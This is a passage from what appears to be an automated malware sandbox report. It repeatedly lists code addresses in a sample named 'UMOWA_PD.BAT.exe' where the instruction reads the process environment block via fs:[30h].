        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE363 mov eax, dword ptr fs:[00000030h]2_2_33CCE363
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB237A mov eax, dword ptr fs:[00000030h]2_2_33CB237A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C89303 mov eax, dword ptr fs:[00000030h]2_2_33C89303
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C89303 mov eax, dword ptr fs:[00000030h]2_2_33C89303
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE310 mov eax, dword ptr fs:[00000030h]2_2_33CAE310
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE310 mov eax, dword ptr fs:[00000030h]2_2_33CAE310
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE310 mov eax, dword ptr fs:[00000030h]2_2_33CAE310
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F30A mov eax, dword ptr fs:[00000030h]2_2_33D4F30A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8E328 mov eax, dword ptr fs:[00000030h]2_2_33C8E328
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63336 mov eax, dword ptr fs:[00000030h]2_2_33D63336
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB332D mov eax, dword ptr fs:[00000030h]2_2_33CB332D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC32C0 mov eax, dword ptr fs:[00000030h]2_2_33CC32C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC32C0 mov eax, dword ptr fs:[00000030h]2_2_33CC32C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB32C5 mov eax, dword ptr fs:[00000030h]2_2_33CB32C5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D632C9 mov eax, dword ptr fs:[00000030h]2_2_33D632C9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D2EC mov eax, dword ptr fs:[00000030h]2_2_33C8D2EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D2EC mov eax, dword ptr fs:[00000030h]2_2_33C8D2EC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C872E0 mov eax, dword ptr fs:[00000030h]2_2_33C872E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A2E0 mov eax, dword ptr fs:[00000030h]2_2_33C9A2E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C982E0 mov eax, dword ptr fs:[00000030h]2_2_33C982E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA02F9 mov eax, dword ptr fs:[00000030h]2_2_33CA02F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E289 mov eax, dword ptr fs:[00000030h]2_2_33D0E289
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97290 mov eax, dword ptr fs:[00000030h]2_2_33C97290
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB42AF mov eax, dword ptr fs:[00000030h]2_2_33CB42AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB42AF mov eax, dword ptr fs:[00000030h]2_2_33CB42AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C892AF mov eax, dword ptr fs:[00000030h]2_2_33C892AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B2BC mov eax, dword ptr fs:[00000030h]2_2_33D6B2BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C2B0 mov ecx, dword ptr fs:[00000030h]2_2_33C8C2B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F2AE mov eax, dword ptr fs:[00000030h]2_2_33D4F2AE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF24A mov eax, dword ptr fs:[00000030h]2_2_33CBF24A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F247 mov eax, dword ptr fs:[00000030h]2_2_33D4F247
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4D270 mov eax, dword ptr fs:[00000030h]2_2_33D4D270
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B273 mov eax, dword ptr fs:[00000030h]2_2_33C8B273
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1B214 mov eax, dword ptr fs:[00000030h]2_2_33D1B214
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1B214 mov eax, dword ptr fs:[00000030h]2_2_33D1B214
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A200 mov eax, dword ptr fs:[00000030h]2_2_33C8A200
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8821B mov eax, dword ptr fs:[00000030h]2_2_33C8821B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCA22B mov eax, dword ptr fs:[00000030h]2_2_33CCA22B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D10227 mov eax, dword ptr fs:[00000030h]2_2_33D10227
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB0230 mov ecx, dword ptr fs:[00000030h]2_2_33CB0230
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01C0 mov eax, dword ptr fs:[00000030h]2_2_33CA01C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01C0 mov eax, dword ptr fs:[00000030h]2_2_33CA01C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA51C0 mov eax, dword ptr fs:[00000030h]2_2_33CA51C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C881EB mov eax, dword ptr fs:[00000030h]2_2_33C881EB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9A1E3 mov eax, dword ptr fs:[00000030h]2_2_33C9A1E3
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBB1E0 mov eax, dword ptr fs:[00000030h]2_2_33CBB1E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C991E5 mov eax, dword ptr fs:[00000030h]2_2_33C991E5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C991E5 mov eax, dword ptr fs:[00000030h]2_2_33C991E5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C891F0 mov eax, dword ptr fs:[00000030h]2_2_33C891F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C891F0 mov eax, dword ptr fs:[00000030h]2_2_33C891F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA01F1 mov eax, dword ptr fs:[00000030h]2_2_33CA01F1
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D581EE mov eax, dword ptr fs:[00000030h]2_2_33D581EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D581EE mov eax, dword ptr fs:[00000030h]2_2_33D581EE
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF1F0 mov eax, dword ptr fs:[00000030h]2_2_33CBF1F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBF1F0 mov eax, dword ptr fs:[00000030h]2_2_33CBF1F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94180 mov eax, dword ptr fs:[00000030h]2_2_33C94180
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1190 mov eax, dword ptr fs:[00000030h]2_2_33CD1190
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1190 mov eax, dword ptr fs:[00000030h]2_2_33CD1190
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB9194 mov eax, dword ptr fs:[00000030h]2_2_33CB9194
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D651B6 mov eax, dword ptr fs:[00000030h]2_2_33D651B6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE1A4 mov eax, dword ptr fs:[00000030h]2_2_33CCE1A4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCE1A4 mov eax, dword ptr fs:[00000030h]2_2_33CCE1A4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov ecx, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov eax, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC41BB mov eax, dword ptr fs:[00000030h]2_2_33CC41BB
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D63157 mov eax, dword ptr fs:[00000030h]2_2_33D63157
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A147 mov eax, dword ptr fs:[00000030h]2_2_33C8A147
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC415F mov eax, dword ptr fs:[00000030h]2_2_33CC415F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D2314A mov eax, dword ptr fs:[00000030h]2_2_33D2314A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96179 mov eax, dword ptr fs:[00000030h]2_2_33C96179
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CE717A mov eax, dword ptr fs:[00000030h]2_2_33CE717A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CE717A mov eax, dword ptr fs:[00000030h]2_2_33CE717A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB510F mov eax, dword ptr fs:[00000030h]2_2_33CB510F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9510D mov eax, dword ptr fs:[00000030h]2_2_33C9510D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0118 mov eax, dword ptr fs:[00000030h]2_2_33CC0118
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F113 mov eax, dword ptr fs:[00000030h]2_2_33C8F113
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC7128 mov eax, dword ptr fs:[00000030h]2_2_33CC7128
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC7128 mov eax, dword ptr fs:[00000030h]2_2_33CC7128
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F13E mov eax, dword ptr fs:[00000030h]2_2_33D4F13E
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAB0D0 mov eax, dword ptr fs:[00000030h]2_2_33CAB0D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B0D6 mov eax, dword ptr fs:[00000030h]2_2_33C8B0D6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C890F8 mov eax, dword ptr fs:[00000030h]2_2_33C890F8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCD0F0 mov eax, dword ptr fs:[00000030h]2_2_33CCD0F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCD0F0 mov ecx, dword ptr fs:[00000030h]2_2_33CCD0F0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C0F6 mov eax, dword ptr fs:[00000030h]2_2_33C8C0F6
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64080 mov eax, dword ptr fs:[00000030h]2_2_33D64080
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8C090 mov eax, dword ptr fs:[00000030h]2_2_33C8C090
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8A093 mov ecx, dword ptr fs:[00000030h]2_2_33C8A093
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D650B7 mov eax, dword ptr fs:[00000030h]2_2_33D650B7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD00A5 mov eax, dword ptr fs:[00000030h]2_2_33CD00A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
